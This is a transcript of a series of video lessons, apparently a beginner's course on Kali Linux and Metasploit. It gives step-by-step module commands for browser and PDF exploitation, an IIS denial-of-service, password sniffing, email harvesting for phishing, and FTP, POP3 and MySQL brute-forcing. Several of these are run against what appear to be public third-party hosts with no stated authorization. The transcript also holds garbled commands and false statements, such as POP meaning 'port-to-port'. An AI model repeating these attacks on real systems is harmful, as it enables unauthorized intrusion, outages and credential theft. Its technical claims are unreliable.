Welcome. In this video, we'll learn about Linux VMware setup. Installing Linux is not much harder as it was for Backtrack operating system back then. Anyhow, for students, I have made this video where student will learn how to install Linux in VMware mode, which is pretty much easy to use. First, let us see why I do recommend students virtual machine mode itself only instead of other options. It gives you a safe environment to play and explore without damaging your files like the files of your Windows operating system or Mac operating system, and will not lose any kind of data in particular. Before we begin, you should have basic knowledge of virtual machine and basic knowledge of little bit of networking. If you don't know, it's fine, and some basic knowledge of Linux or Unix operating system. If you have no idea, then also it's fine. You will learn and explore with it, but you will feel a little bit of difficulties. What is required? You have to download the VMware version of Linux operating system we will see in this video, and you should have virtual machine installed. That also we will see in this video. Let's begin. First, open a browser and search for VMware version of Linux. Just type Linux VMware. Go to the link of Linux official website. You'll get the download links. Just download whichever suits you. My computer is 64-bit, so I will go for 64-bit link. After downloading, just extract it and keep it as it is. We'll come back to it later on. Now search for VMware, download the VMware and install it. I will just keep this installation as it is pretty much simple. Now back to the extracted folder. You can see that virtual machine configuration file. Double click on Linux 2018 VM EMD64 virtual machine configuration file. You can see that Linux started up in VMware. So this is how you set up Linux operating system in VMware, which I do recommend to my student all the time. That's all. Thank you for watching this video. Welcome. In this video, we will see how to make Linux operating system bootable. Linux has two options in the default boot menu, which enable persistence, the preservation of data on Kali Live USB drive, and second, across reboot of Kali Live. This can be an extremely useful enhancement and enables you to retain documents, collected testing results, configuration, etc. Persistence means that all data changes that take place while you are using the system, they'll be saved on the USB or pen drive that which you have made bootable. To make use of USB persistence option at boot time, you will need to do some additional setup on your Linux Live USB drive, and in this video we will cover that. First of all, reason for using Live USB drive with persistence. You can preserve data on Kali Live USB, you can install some addition packages, you can take no space of your hard drive for it, you can take your OS to any PC you use all of your system resources, example CPU, RAM, GPU, etc. Now let's begin. Let's open a browser and search Linux download in Google. You will see that kali.org official website download link. Click on it. Now download the latest Kali image file. I will click on Linux 64-bit OS. You can go for 32-bit if you have 32-bit operating system. It's downloading. I will just fast forward this process. Downloading is complete. You can see the image file of Linux operating system. Now I want Power ISO tool. I will go and search for Power ISO tool to make it bootable. So I will type Power ISO, click on Power ISO official website. Here I am downloading 32-bit Power ISO version. After downloading, install it. I have already installed, so I will just open it up. In administrator mode, you see that Power ISO main window. Click on Tools tab, select Create Bootable USB Drive, select image file which we have downloaded, I mean the image file of Linux operating system. Plug your USB drive. You should have minimum 8 GB. Sometime I did it on 4 GB pen drive, but sometime it may work, but it's better to go for 8 GB one. Refresh it. You can see that my pen drive is listed here, that is SanDisk USB, and finally click on start button to create bootable USB. It will take few minutes, so here I am forwarding the video. You can see that writing USB drive completed successfully. So this is what you have to do to make a bootable Linux operating system. Let me restart my system. On your PC boot, it will give you few of the options, that is live AMD 64, live AMD 64, fail-safe, live forensic mode, live USB persistence, live USB encrypted persistence, and install. I will go for live mode. You can see that it is running and the Linux system loaded up. So this is how you make Linux bootable in a pen drive. So that's all. Thank you for watching this video. Welcome. In this video we are going to learn setting up Metasploitable machine. Metasploitable is an intentionally vulnerable Linux virtual machine. This virtual machine can be used to conduct security training, test security tools, and practice common penetration testing techniques. Let's open a browser and search Metasploitable to download. Click on sourceforge.net link. You can select any link like Rapid, GitHub, and so on. I will go for sourceforge.net. Let's download Metasploitable to zip file. Here you can see that it is downloaded. Extract the zip file. Open up extracted folder and run Metasploitable VMware virtual machine file. Here you can see that Metasploitable 2 is loaded in virtual machine. Type username as msfadmin and password as msfadmin. Let's see Metasploitable 2 IP address. Its IP address is 192.168.154.246. By changing from NAT to bridge, opens the VMware and network up to potential attacks. To maintain a safe network, you could skip this process of NAT to bridge and only use the host only network. So that's it in this video on setting up Metasploitable vulnerable machine. Thank you for watching this video. Welcome. In this video we are going to learn Metasploit basic commands. Let's open up MSF console. The help menu can be viewed by issuing the help command. So in Metasploit, type help. Here you can see that Metasploit framework help options, core commands, module command, job command, and so on. The help command will give you a limited list of commands which you can use in MSF console. Whenever you want the help, you can type the help to get to know about it. Info is another basic command in Metasploit that enables us to see all the basic information about an exploit. After selecting an exploit, type info command. Here we can see that the basic usage and its options for info command. Info and the module name. So type info ARMLE or simple. We can see that all of the options, targets, and a description for the exploit. Set is a basic and critical command or keyword in Metasploit. We can use it to set parameters and variables necessary to run the exploit. These variables can include the payload, the rhost, the lhost, the target, URI path, etc. Let's type set space -h. Here you can see that set command usage as set options value. Now let's set rhost value. So type set rhost 8.8.8.8. Here you can see that rhost is set. We can unset the value using unset method. So type unset our host. Here you can see that our host is unset. So that's it in the first part of Metasploit basic commands. Thank you for watching this video. Welcome. In this video we will see Metasploit basic command part 2. In the previous video we have already learned few basic command, that is help, info, set and unset. In this video, first let's see search command. As Metasploit contains over 1500 different exploits and the new ones are added regularly, with this number of exploits the search function and knowing how to use it becomes very important. The easiest way of using the search function is by issuing the command search followed by a search term. So type search. Here you can see that it will search all modules. Type search space -h. Here you can see that the search command, basic usage and its option. App, module that are client or server attacks. Author, module written by this author and so on. So let's search exploit module. Copy and paste the example. Search CVE 2009 type exploit app client. Here you can see that the module is released in 2009 and the type as exploit. Use command. The use command is used to interact with the module of a given name. So type use, basic usage as use module name. So type use exploit /windows/ftp pro ftp banner. Show options command. The show options command will show you the available parameter for an exploit if used when the command line is in exploit context. Let's use the Adobe Flash shader drawing fill exploit and have a look at the option with the following command. The Flash exploit contains a total of 6 options from which only 2 are required. In retrieve, SRV host is required and SRV port is required. SSL, SSLCRT URL path are not required. Now let's see the session command. The session command is used to list or set a session. When used with the -l, that is list switch, it will list all open sessions. When used with the number, that is session space -1, it tells Metasploit to activate the first session. Metasploit allows us to run multiple sessions on the same system or multiple sessions on multiple systems. Using the session command, we can find these open sessions and switch to or activate them. Type session. Here you can see that no session is activated. Exploit command. After choosing our exploit, setting all our variable and choosing our payload, the last thing we have to do is to type the exploit command. This launches the exploit against the target machine with the payload and any variables we might have set, and the run command also works same. Back command. When we're done working with particular module or we choose the wrong module, we can use the back command to return to the MSF console prompt. For instance, if we choose an exploit and then we realize we have took the wrong one, we can simply type back and then use the use command to select another module. So that's it in this video on part 2 of Metasploit basic command. Thank you for watching this video. Welcome. In this video we are going to learn connect command in Metasploit. There is a miniature netcat clone built into the MSF console that supports SSL, proxies, pivoting and file transfers. By issuing the connect command with an IP address and port number, you can connect to a remote host from within MSF console, the same as you would with netcat or telnet. Let's open up terminal and nmapping on gold.com. Type nmap gold.com. It will take few minutes, so here I'm forwarding it. Here we can see that FTP, HTTP, HTTPS, RTSP, PPTP are the open ports. Now open up Metasploit framework, type MSF console. You can see all the additional options by issuing the -h parameter, the basic usage, connect options, communicate with the host similar to interacting via NetGet, taking advantage of any configured session pivoting. Basic options -C, try to use CRLF for eval sequence, -P specify source port, -S specify source address, -c specify which communication to use, and so on. Now let's connect the Google 443 open port. Type connect 216.58.203.142.443. Here you can see that our terminal is connected to 443 port google.com. So that's it in this video on connect command in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn host command in Metasploit. We can import and export information to and fro from our database. Let us look at how we can use this information within the MSF console. Many commands are available to search for specific information stored in our database: host name, address, discovered services, etc. We can even use the resulting data to populate module settings such as rhost. We'll look how this is done a bit later. The host command was used earlier to confirm the presence of data in our database. Let's look at the different options available and see how we use it to provide us with the quick and useful information. So let's open up terminal, load MSF console. We'll start by asking the host command to display only the IP addresses and OS type using the -c switch. Type hosts -c address OS flavor. Another interesting feature available to us is the availability to search all our entries for something specific. Imagine if we wish to find only Linux-based machines from our scan. For this, we would use the -s option. Type hosts -c address OS flavor -s Linux. Here you can see that address and OS flavor. So that's it in this video on host command in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn installing and configuring PostgreSQL in Backtrack or Linux operating system in Metasploit. An important feature of Metasploit is the presence of databases, which you can use to store your penetration testing result. Any penetration test consists of lots of information and can run for several days. So it becomes essential to store the intermediate result and findings. A good penetration testing tool should have proper database integration to store the results quickly and effectively. Metasploit comes with PostgreSQL as a default database. Let us first check out default settings of the PostgreSQL database. We will have to navigate to database.yml is located under opt/framework3/config. Let's open up terminal, type cd user/share/metasploit-framework. Type ls. Here we can see that MSF executable files, msft, MSF console, and so on. Let's open up database.yml file, type cat user share Metasploit framework config database.yml. Here you can see that database name, username, password, and so on. Using this username and password, let's connect with Metasploit database. Now let's open up MSF console first. Type MSF console. Let's first check available database drivers. Type db_driver. Rapid7 has dropped the support for MySQL database in recent version of Metasploit, so the db_driver command may not work. The only default driver supported with the framework in that case will be PostgreSQL. Now connect the driver to MSF console. We will use db_connect command. Type db_connect msf password @127.0.0.1, that is localhost 7175/msf. Here we can see that my PostgreSQL is already connected to MSF. If you want to disconnect, you can type db_disconnect command. So that's it in this video on installing and configuring PostgreSQL in Linux or Backtrack in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn how to import Nmap result into Metasploit. It is very helpful to scan your targets with Nmap and then import the result into Metasploit. All you have to do is scan your target using the -ox option to generate an XML file that will contain the results. Importing Nmap scans directly into Metasploit is one of the best time-saving tricks you can accomplish while using the Metasploit framework. PostgreSQL database and accessible to Metasploit, you can do all kind of cool things with it, and that will save you lots of time and frustration on large penetration tests. Let's scan 192.168.1.0 Let's open up terminal. Here I scanned 192.168.1.0 Result is saved in subnet1 file. Type ls. Here we can see that subnet1 is present in root directory. Let's launch the MSF console. Type db import subnet1. Here we can see that data is imported successfully. Once this completes successfully, your Nmap data will be contained in the PostgreSQL database and fully accessible to Metasploit. This opens up all kinds of flexibility that will really save your bacon on large scans. If you want, you can also perform Nmap scans directly from within the Metasploit framework and have it automatically added to the database. To do this, use db_nmap command followed by the flags you wish to use and the host or subnets you want to scan. To verify that the result from the scan are stored in the database, type host. Here you can see that our Nmapping result hosts. So that's it in this video on importing Nmap result into Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn root command in MSF console. The root command in Metasploit allows you to root sockets through a session or command, providing basic pivoting capabilities. To add a root, you pass the target subnet, a network mask followed by the session number. Let's open up MSF console and type root -h. You can see the basic usage root command. Root add or remove subnet net mask. Subcommands add, make a new root, remove, delete a root, del is an alias, and so on. Add a route from all hosts from 192.168.1.100 to 192.168.1.100 through session 1. Type route add 192.168.1.100 space 255.255.255.255 space 1. You can see router is added. Type route. This command will show all the active routing tables. Let's display the route that will be used for the given host or network. Type route get 192.168.1.100. 192.168.1.100 routes through session 1. You can delete using remove or del option. Like route remove 192.168.0.0 24 1. Route del 192.168.0.0 255.255.255.0 1. So that's it in this video on route command. Thank you for watching this video. Welcome. In this video we are going to learn search targets in Metasploit. After we have set up new workspace, we need to scan a host in order to save its detail in the database and attack it automatically with the db-auto-pwn plugin. So let's quickly perform a scan with the nmap plugin in Metasploit named db-nmap and store its result in the database. Let's open up MSF console in terminal. MSF console is opened here. And now type host. Here you can see that existing host in the database 192.168.0.3, 192.168.0.4, Peter PC, and so on. The db-nmap command stores the result of the port scan directly into the database, along with all relevant information. Type db-nmap 192.168.1.1 24 -vv verbose mode output. Here you can see the Discord ports as 139, 135, 192.168.1.6, host, and so on. Once it complete, re-execute the host command. Here you can see that unknown PC MAC address. Now let's scan the 192.168.1.6. Here you can see that the 3 ports are opened and victim PC MAC address. Using this technique, now I am going to grab footprinting of victim PC. Type db_nmap-a -t4 192.168.1.6 Here you can see that victim PC footprinting is grabbed, and also you will get PC NetBIOS name and so on. So that's it in this video on search targets in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn simple network management protocol sweeping in Metasploit. The simple network management protocol is used on network devices to read, write, and update device configuration remotely. SNMP sweeps are often a good indicator in finding a lot of information about specific system or actually compromising the remote device. In this video, we'll learn to use the SNMP scanning module. The Metasploit has a built-in auxiliary module specifically for sweeping SNMP devices. One must understand it before performing an attack. First read only and read-write community strings play an important role in the sort of information that can be mined or altered on the devices themselves. The Management Information Base interface allows us to query the device and extract information. When querying through SNMP, there is MIB API. MIB stands for Management Information Base. This interface allows us to query the device and extract information. Metasploit comes loaded with a list of default MIBs in its database. They are used to query the device for more information, depending on whether the bar of access is obtained. We can gather lots of information using SNP scanning module such as open ports, services, host names, process, and uptime. To achieve this, we will run the SNMP enum module and see what information it provides us with. First, we'll load the module and set the rhost option using the information stored in our workspace. Using the host -r will set this option for us. Let's see how it works. Let's open up Metasploit console, type msf console. Now I'm going to load SNMP login module into the msf console. So type use scanner /snmp/snmp_login. The module is loaded. Now let's see the module information. Type info. Here you can see that module information. And you can also see module basic option, blank passwords, brute force speed database, and all credentials. Now let's load the remote host address as my bbox virtual machine IP address. Typeset rhost 192.168.1.0 set threads option as 30. Now see the all options are set or not. Type show options. Here you can see that all options are set. Now let's execute the module using run command. Type run. Here you can see that login is successful on my bbox virtual machine. So that's it in this video on simple network management protocol sweeping in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn ARP sweep module for scanner discovery auxiliary module in Metasploit. When your target systems are located on the same network as your attacking machine, you can enumerate systems by performing an ARP scan. Naturally, Metasploit has a module that can help you out. Let's open up terminal and type msf console. Load the ARP sweep module into msf console. Type use auxiliary scanner discovery ARP_sweep. Type info. Here we can see that module information, basic options as interface, the name of the interface, rhost the target range or CIDR identifier, host source IP address, and so on. Due to the manner in which ARP scanning is performed, you need to pass your MAC address and source IP address to the scanner in order for it to function properly. Let's set the remote host address range. Type rhost 192.168.1.1 to 55. Let's set Kali IP address as 192.168.1.103. Let's set MAC address. Open up another terminal, type ifconfig. Here you can see that Kali MAC address. I have copied it up. Set concurrent thread as 255. Execute the module. Type run. Here you can see that live PC are in localhost 192.168.1.1, 101, 194, and so on. So that's it in this video on ARP sweep, which is a scanner discovery auxiliary module in Metasploit. Thank you for watching this video. So welcome. In this video we are going to learn a PWN auxiliary module in Metasploit. When you are trying to hack a target, we want to know as much as possible about the target through reconnaissance. Then and only then we can choose an appropriate exploit. We should know the operating system, the application, the browser, the version of Java and Flash, etc. It's tedious but necessary work. Using a Java exploit when a Flash exploit is called for simply won't work and might land you behind the bars. The beauty of AutoPWN is that it relieves you of some of the hard work of reconnaissance. AutoPWN will first try to fingerprint the victim's browser, then throw at it whatever the exploit it thinks might work. It makes life quite simple. The downside of AutoPWN is that it is very noisy and can lead to either detection by the target or crashing the browser. Let's open up terminal and load MSF console. Use AutoPWN to get started with an exploit. Generally we start with using the command. Since the AutoPWN module is located at auxiliary server browser underscore AutoPWN, type use auxiliary /server browser underscore AutoPWN. Type info. Here you can see this provides us with all the information we need to get started, including each of the options and a brief description of the module. Now we need to set lhost URI path. The lhost is localhost. Open up another terminal, type ifconfig. Here you can see that IP address 192.168.0.2. We need to create URI path. This is the URL that we want the exploits to be located at our malicious server. We can call it anything we want, or we could leave it blank and Metasploit will set it to a default string. Since we are trying to make a victim to click on this link, type set URI path hacking tut. Let's exploit it. This will start the AutoPWN module. It starts numerous servers and then loads the exploit that may work against that browser. Each one represents a different possible vulnerability in our browser. Be patient as this takes a while. Here I'm just forwarding it. Now from Windows 7 system with Internet Explorer 9, when the target navigates to our web server at 192.168.1.06.8080 hacking tut, here you can see that we get warning message from Internet Explorer. AutoPWN is fingerprinting the browser and trying to determine which of the exploit will work. Here you can see that reporting OS product Windows 7, OS version Service Pack 0, OS language English US, OS architecture x86, OS certainty 0.7. So that's it in this video on AutoPWN, which is auxiliary module in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn PDF authentication bypass auxiliary module in Metasploit. This module exploits an authorization bypass vulnerability in Foxit Reader build 1120. When an attacker creates a specially crafted PDF file containing an open or execute action, arbitrary commands can be executed without confirmation from the victim. Let's open up terminal, type MSF console. Now let's load the authentication bypass module into the MSF console. Type use auxiliary /pdf/foxit/authentication bypass. Type info. You can see that module information. Basic options are cmd command to execute it. File name, the name of the file. Here I saved uplen.pdf file in desktop. Let's set the upl-en.pdf file. Type set file name root/desktop upl-en.pdf. Let's execute it. Type run. You can see that our bypass vulnerability Foxit reader file is saved in root/.msf4 local directory. Using this file, you can send to victim by social engineering technique. When the victim opens the PDF file, we get Metasploit session. So that's it in this video on PDF authentication bypass in Metasploit. Thank you for watching this video. Welcome. In this video, we are going to learn DOS attack using MS-10 II6 ASP-DOS module. The vulnerability allows remote unauthenticated attackers to force the IIS server to become unresponsive until the IIS service is restarted manually by the administrator. Required is that the active server pages are hosted by the IIS and that an ASP script reads out a post form value. Type use auxiliary DOS Windows HTTP MS-10 065 II6 ASP_DOS. Type info. Here you can see that module information options as our host, target host address, our port, target port, and so on. Let's set target host as hackingtool.com. Type set our host 107.180.54.186. Type options. Here you can see that target IP address is set. Type exploit. Here you can see that DDoS attack is started on 107.180.54.186 host. So that's it in this video on DOS attack module in Metasploit. Thank you for watching this video. Welcome. In this video, we are going to learn password sniffing with Metasploit. Max Moser released a Metasploit password sniffing module named PSNuffle that will sniff passwords of the wire similar to tool DSNiff. It currently supports POP3, IMAP FTP, and HTTP GET. More information is available on his blog. Using the PSNuffle module is very simple. There are some options available, but the module works great out of the box. Let's open up terminal, type MSF console, load PSNuffle module into MSF console, type use auxiliary /sniffer/PSNuffle. Type info. Here you can see that PSNuffle module, author and options information. Let's see the basic options which are required for auxiliary module. Filter, the filter string for capturing traffic. Interface, the name of the interface. PCAP file, the name of PCAP capture file to process, and so on. There are some options available, including the ability to import a PCAP capture file. We'll run the PSNuffle scanner in its default mode. Let's set required fields. Type set interface ETH0. Let's execute it. Type run. We have captured successfully the FTP login. This is an excellent tool for passive information gathering. So that's it in this video on password sniffing using Metasploit. Thank you for watching this video. Welcome, in this video we are going to learn email harvesting with Metasploit. Out of the many useful auxiliary modules that Metasploit has, one is called Search Email Collector, which searches Google, Bing and Yahoo for email addresses associated to a particular domain. This is useful in automated information gathering during a penetration test program. The location inside MSF console is auxiliary/gather/search email collector. Let's launch MSF console. Type search gather auxiliary. Towards the lower part, we see the module called search email collector. This is the one we are going to use. Load the search email collector module. Type use auxiliary gather search email collector. Type info. Here you can see that module information, basic options, domain, the domain name to locate email addresses for, out file, a file name to store generated email list, and so on. The important option to fill is the domain name. Apart from that, the search engine to use can be selected. By default, Google, Bing, Yahoo, all three are selected. Set the domain name and run the scanner. Set domain name as anonymous website. Execute it. Here you can see that email's name. Email harvesting can be used by hackers to carry out a phishing campaign against an entire organization. This is one aspect of how email can be misused. Computer users who are often unaware of phishing attack can fall victim and end up losing confidential information to the hackers or getting their system compromised. If a hacker gets control of single machine inside an organization network, it might open for him the path to access and exploit the entire network of organization. Although phishing is a social engineering attack that is amongst the least dangerous one, but given the right opportunity to the hacker, it has the potential to lead to the worst security breaches. This particular technique of email harvesting is based on data from search engines and therefore is not supposed to be very accurate. Email addresses that are found on web pages and become visible to the search engines are crawled. Those can be discovered by using proper search parameter in respective search engine. So that's all in email harvesting with Metasploit. Thank you for watching this video. Welcome, in this video we are going to learn finding deleted web pages in Metasploit. This module pulls and parses the URL stored by archive.org for the purpose of replaying during a web assessment, finding unlinked and old pages. Use Metasploit to retrieve deleted web pages. Metasploit has an auxiliary module that is capable of retrieving all of the old URL from archive.org that are stored for a particular domain. Since the Internet Archive's website tool is referred to as Wayback Machine, Metasploit has a module called enum wayback, short for enumerate wayback machine. Let's open up terminal, type msf console. Let's load the wayback module by typing use auxiliary scanner http enum_wayback. Type info. Here you can see module information. This module basically has just two parameters to set: the domain we want to search for on archive.org, the file we want to save the information in. Let's set the output to a file as output. Type set out file output. Let's set domain as anonymous website. Start the Wayback Machine. Exploits in Metasploit, where we type exploit to start them. Auxiliary modules are initiated by typing run. This module will now go to output and begin to retrieve every saved URL over the years. In the case of Anonymous, it is over 5 URLs. Since we told this module to store all of the URL in the file named output, all these URLs are returned to this file. So that's it in this video on finding deleted web pages in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn detecting SSH version scanner in Metasploit. This SSH version module detects SSH version. Let's open up MSF console. Type search SSH version. Here you can see that SSH version module. Now let's load the SSH version module into the MSF console. Type use auxiliary /scanner /SSH version. Type info. Here you can see that SSH version information. Now set our host as 192.168.1.124. Type set our host 192.168.1.124 and set threads as 100. Finally exploit it. Here you can see that 192.168.1.109.22 version is SSH 2.0 OpenSSH 7.5 P1. So that's it in this video on detecting SSH version with SSH version scanner in Metasploit. Thank you for watching this video. Welcome. In this video we will see unintentional backdoors using dist-cc exec module in Metasploit. In addition to the malicious backdoors in previous section, some services are almost backdoors by their very nature. The first of which installed on Metasploit table 2 is dist-ccd. This program makes it easy to scale large compiler jobs across a farm of like configured system. The problem with this service is that an attacker can easily abuse it to run a command of their choice. Let's see the demonstration. Open up terminal and type msf console. Load dist-cc_exec module into the msf console. Type use exploit /unix misc dist-cc_exec. Type info. Here you can see that the options are host the target address, or port the target port. This module uses a documented security weakness to execute arbitrary command on any system running dist-ccd. Let's set the remote host address as Metasploit table 2. Type set our host 192.168.0.14. Set target as 0. Exploit it. Here you can see that we get Meterpreter session. So that's it in this video on dist-cc_exec, which is unintentional backdoor in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn endpoint mapper, which is scanner DCERPC auxiliary modules in Metasploit. Let's open up MSF console. Load endpoint mapper module. Type use auxiliary scanner DCERPC endpoint_mapper. Type info. Here you can see that module information. Basic options as our host target address range or CIDR identifier. Our port the target port. Threads the number of concurrent threads. All we need to do is pass it a range of IP addresses. Type our host 192.168.0.124. Set the threads count. type set threads 255 and type run. Here you can see that this module can be used to obtain information from the endpoint mapper service like pipe /lsaws ytpc key ISO. So that's it in this video on endpoint mapper. Thank you for watching this video. Welcome. In this video we are going to learn enum wayback HTTP auxiliary scanner in Metasploit. The enum wayback auxiliary module will query the achieve.org site for any URLs that have been achieved for a given domain. This can be useful for locating valuable information or for finding pages on a site that have since been unlinked. Let's open up terminal, type MSF console. Let's load the enum wayback module into the MSF console. Type use auxiliary /scanner HTTP enum_wayback. Type info. Here you can see that module informations and basic options. Domain to request URLs for. Out file where to output the list for use. The only configuration item that we need to set is the domain value, and then we let the scanner to do its thing. Type set domain as hackingtube.com. Type set out file as output. Let's execute it. Type run. You can see that 3 addresses for hackingtube.com. Now let's set metasploit.com. Execute it. Here you can see that 27,853 addresses for metasploit.com. Let's open up output file. Here you can see that all addresses are saved here. So that's it in this video on enum wayback, which is HTTP auxiliary scanner in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn FTP brute login attack in Metasploit using FTP login module. This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and host so you can track your access. Let's open up terminal and load MSF console. Type use auxiliary /scanner FTP FTP_login. The FTP login auxiliary module will scan a range of IP addresses attempting to log in to FTP server. This module can take both word list and user specified credentials in order to attempt to log in. Type info. Here you can see that module options and descriptions. Let's set our host as 148.138.144.170. Set threads 30. Let's set username and password file here. I saved username and password file most recently people used. Type set user_file root desktop usernames.txt. Type set pass_file root desktop password.txt. Let's see the options. Here you can see that all options are set. Execute the module. Type run. Here you can see that brute force attack is started. If any username and password matches, it will terminate. So that's it in this video on FTP brute login in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn FTP server anonymous in Metasploit. The FTP anonymous scanner will scan a range of IP addresses searching for FTP servers that allow anonymous access and determine where read or write permissions are allowed. Let's open up terminal and load Metasploit console. Type use auxiliary scanner FTP anonymous. Type info. Here you can see that basic options, name, current setting, required description. In name FTP pass, current setting mozilla@example.com. Required no description, the password for specified username. Name FTP user, current setting anonymous, no. Username to authenticate as rhost, rport, rthread, and so on. Set rhost as 148.138.144.170 24. Type run. Here you can see FTP versions and banners. So that's it in this video on FTP server anonymous in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn FTP version scanner for information gathering auxiliary module in Metasploit. The FTP version module simply scans a range of IP addresses and determines the version of any FTP servers that are running. Let's open up terminal and load MSF console. Let's use module as FTP version. Type use auxiliary scanner FTP _version. Type info. Here you can see that module author, information and basic options. Name, current, required description. That is FTP pass, FTP user, our host, our port, which is set at 21, thread 1. Now let's set options, our host. Type set our host 140.130.144.178 24. Let's see the option. Here you can see that our host is set. Let's set threads 55. Type run. Here you can see that it will display the versions and FTP banners. So that's it in this video on FTP version auxiliary module in Metasploit. Thank you for watching this video. Welcome. We are going to learn IMAP banner grabber auxiliary module in Metasploit. What is IMAP? The Internet Message Access Protocol is an application layer internet protocol that allows an email client to access email on a remote email server. The current version, IMAP version 4, revision 1, is defined by RFC 3501. An IMAP server typically listens on well-known port 143. IMAP over SSL is assigned well-known port number 993. IMAP supports both online and offline modes of operation. Email clients using IMAP generally leave messages on the server until the user explicitly deletes them. This and other characteristics of IMAP operation allow multiple clients to manage the same mailbox. Most email clients support IMAP in addition to Post Office Protocol to retrieve messages. The IMAP version auxiliary module is a relatively simple banner grabber for IMAP servers. Let's open up terminal and type nmap anonymous website. It will take few minutes. Here I am forwarding it. Here you can see that 143 TCP services is opened. Type MSF console. Search IMAP. Let's load IMAP version MSF module into the MSF console. Type use auxiliary /scanner /IMAP /IMAP_version. Type info. Here you can see that basic info for IMAP_version module. Set remote host address as anonymous IP 136.243.69.14. Execute it. Type run. It grabbed module version and IMAP4 banner. That's it in this video on IMAP banner grabber auxiliary module in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn another module which is based on scanner discovery auxiliary module IPv6 neighbor in Metasploit. The IPv6 neighbor auxiliary module probes the local network for IPv6 hosts that respond to neighbor solicitations with a linked local address. Like this module, the ARP sweep, we learned about such module in previous videos, will generally only work within the attacking machine's broadcast domain. Let's open up terminal and type msf console load IPv6 underscore neighbor module in msf console. Type use space auxiliary /scanner /discovery IPv6 underscore neighbor. Type info. Here you can see that the module information, the basic option as interface, the name of the interface, pcap file, the name of pcap capture file to process, rhost, the target address range or CIDR identifier, and so on. Let's set the required field option values. Rhost value. We also need to set our source MAC address, which we'll call as smac, and source host IP address, which we will call as shost. We then set our rhost and thread values and let the scanner run. Type set rhost 192.168.1.1 to 254. Type set shost 192.168.1.103. Let's set smac address. Type set smac, paste it. Let's set concurrent threads as 255. Let's execute it. Here you can see that this scanner serves the dual purpose of showing what hosts are online, similar to ARP sweep, and then performs the IPv6 neighbor discovery. So that's all in this video on IPv6 neighbor scanner discovery auxiliary module in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn DHCP auxiliary module in Metasploit. The action plan here is to start a fake DHCP server and employ a fake DNS server. This module provides a DHCP server. Let's open up terminal. Type msf console. Let's load the DHCP module into the msf console. Type use auxiliary server DHCP. Type info. Here you can see that information of the DHCP module. We will be setting the option for DNS server, netmask, and SRV host, which are to be fake DNS server, its network mask, and the IP address of this fake DHCP server. Set DNS server as our hackingtube.com, IP address as 107.180.54.186. Set netmask as 255.255.0.0. Let's execute it. Here you can see that DHCP server is started. DHCP works by leasing IP addresses and IP information to network clients for a period of time. With the fake DHCP server running, we use Metasploit again to now configure our fake DNS server. So that's it in this video on Metasploit providing fake DHCP server. Thank you for watching this video. Welcome. In this video, we are going to learn NB name scanner NetBIOS auxiliary module in Metasploit. The NB name auxiliary module scans a range of hosts and determines their host name via NetBIOS. Let's open up terminal and type nmap 192.168.1.10. It will take few minutes. Here I am forwarding it. Here you can see that 139 port is open, NetBIOS SSN. Let's open up Metasploit console, load NB name module, type use auxiliary scanner NetBIOS NB name. Type info. Here you can see that module information, basic options, batch size, the number of hosts to probe in each set, R host the target address range or CIDR identifier, R port the target port, threads the number of concurrent threads, discover host information through NetBIOS. Let's set required options. Type set R host 192.168.1.1 255. Type set threads 255. Let's see the option. Type show option. Here you can see that all required field is set. Let's execute it. Type run. Here you can see that 192.168.1.107. Target PC name is YTPC. OS Windows. Request to 192.168.1.1 to 192.168.1.255. So that's it in this video on NB name scanner NetBIOS auxiliary module in Metasploit. Thank you for watching this video. Welcome. In this video, we are going to learn POP3 login scanner, POP3 auxiliary modules in Metasploit. This module attempts to authenticate to an POP3 service, that is port-to-port service, that is basically POP stands for port-to-port. Let's open up terminal and type msf console, search POP3. You can see that POP3 login module. Let's load POP3 login module into the MSF console. Type use auxiliary /scanner POP3 POP3_login. Type info. Here you can see that module information with basic options. Let's set required options. Set remote host address as 136.243.69.14. Type set R host 136.243.69.14. Set brute force _speed 5. Execute it. Type run. Here you can see that brute force attacking is started. Successfully cracked. Password is MSF admin. So that's it in POP3 login or scanner POP3 auxiliary module in Metasploit. Thank you for watching this video. Welcome. In this video, we are going to learn scanner auxiliary modules, MySQL brute force attack in Metasploit. This module simply queries the MySQL instance for specific user or password. Let's load MySQL login module. Type use auxiliary /scanner /MySQL /MySQL_login. Type info. Here you can see that module info. Basic option as blank password, try blank password for all user. Brute force speed, how fast to brute force from 0 to 5. R host the target address range or CIDR identifier. R port the target port and so on. Let's configure our scan. Here I created word list for module to files containing username and password saved on desktop. Type user underscore file root desktop usernames.txt. Type pass underscore file root desktop password.txt. Let's set target address 192.168.0.21 victim address. Execute it. Here you can see that brute force attack is started on 192.168.0.21 host. When login successful, it will show username and password. So that's it in Scanner Auxiliary Module MySQL brute force attack in Metasploit. Thank you for watching this video. Welcome. In this video, we are going to learn SIP invite spoof impersonation attack in Metasploit. Impersonation attack is a scenario where an unknown user may impersonate a legitimate user to call other legitimate users on the VoIP network. Few modifications in the invite request would result in this attack. There are several ways to craft a malformed SIP invite message. Let's use Metasploit auxiliary module SIP invite spoof to craft an invite message. Let's open up terminal and type msf console. We will load Metasploit auxiliary module SIP invite spoof. Type use auxiliary VoIP SIP invite spoof. Type info. Here you can see that module information. Domain, use a specific SIP domain. Extension, the specific extension or name to target. Message the spoofed caller ID to send, and so on. Let's set required option. Type set MSG user B. Set our host as 192.168.0.12. Set concurrent threads as 5. Type show option. Here we can see that all the options are set. Let's set domain name as google.com. Execute it. Here you can see that sending fake SIP invite to google.com. Unset the domain name. Execute it. Type run. Here you can see that send fake SIP invite to 192.168.0.12. So that's it in this video on SIP invite spoof impersonation attack in Metasploit. Thank you for watching this video. Welcome. In this video, we are going to learn SMB version auxiliary module in Metasploit. What is SMB? It stands for Server Message Block, one version of which was also known as Common Internet File System, that is CIFS, operates as application layer network protocol, 